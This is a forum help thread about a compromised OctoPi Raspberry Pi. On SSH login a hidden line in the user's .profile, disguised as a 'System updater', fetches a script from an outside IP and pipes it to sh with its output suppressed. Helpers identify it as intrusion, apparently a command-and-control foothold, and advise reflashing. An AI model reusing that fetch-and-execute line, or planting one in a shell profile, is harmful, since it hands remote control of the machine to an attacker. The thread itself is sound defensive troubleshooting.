Ssh login strange process

What is the problem?
after I logged me in via Putty on ssh, there is no prompt rather a process which try to connect to http://161.35.78.255/system_manager.sh

25-09-_2020_20-02-25

I can press ctrl + c to interupt and to get a prompt
I dont know what this is

What did you already try to solve it?
tried to find it with grep -Ril "system_manager.sh"

Logs (syslog, dmesg, ... no logs, no support)
cat auth.log.1 | grep "161.35.78.255"
Sep 15 03:05:08 octopi sshd[19134]: Accepted password for pi from 161.35.78.255 port 45794 ssh2
Sep 15 03:05:08 octopi sshd[19171]: Accepted password for pi from 161.35.78.255 port 45802 ssh2

Additional information about your network (Hardware you are trying to connect to, hardware you are trying to connect from, router, access point, used operating systems, ...)

I use thes auth settings:

grafik

maybe there is something messed up in the putty settings

Maybe there is something in .profile or .bashrc or so.

Try to login as root and see if the same problem occurs with su - pi.

Please provide some of the missing information. My first guess is that your system has been hacked. Could be the system you are connecting from or the RPi you are connecting to.

@ Ewald
i checked my settings, they are the same.
I have the same behaviar from windows comandline when I do ssh pi@192.168.0.17

Additional information about your network
Host System Windows 10
Raspberry Pi 3B
OctoPrint version : 1.4.2
OctoPi version : 0.17.0
LAN Connection vi HUB

@ jandar
Bam you were right, I checked the .profile and the last entry is

 # System updater below
 wget http://161.35.78.255/system_manager.sh -O- | sh > /dev/null 2>&1

so i comment it out and now I have a normal behaviar.

Thx all for your time and your help.
So ill check where it come from...

1 Like

This looks like someone got access to your system (did you create a port forward to SSH but did not set a strong password or better public key login only? Don't do that) and installed half of a command and control kit to make it part of a bot server. If I were you I'd nuke this and flash a fresh image, then rethink your network security. This machine looks compromised.

1 Like

mhhh could be and yes sounds like, few month ago I played with some remote access via vpn.
So ill check my network and clean up my system, thanks all for your help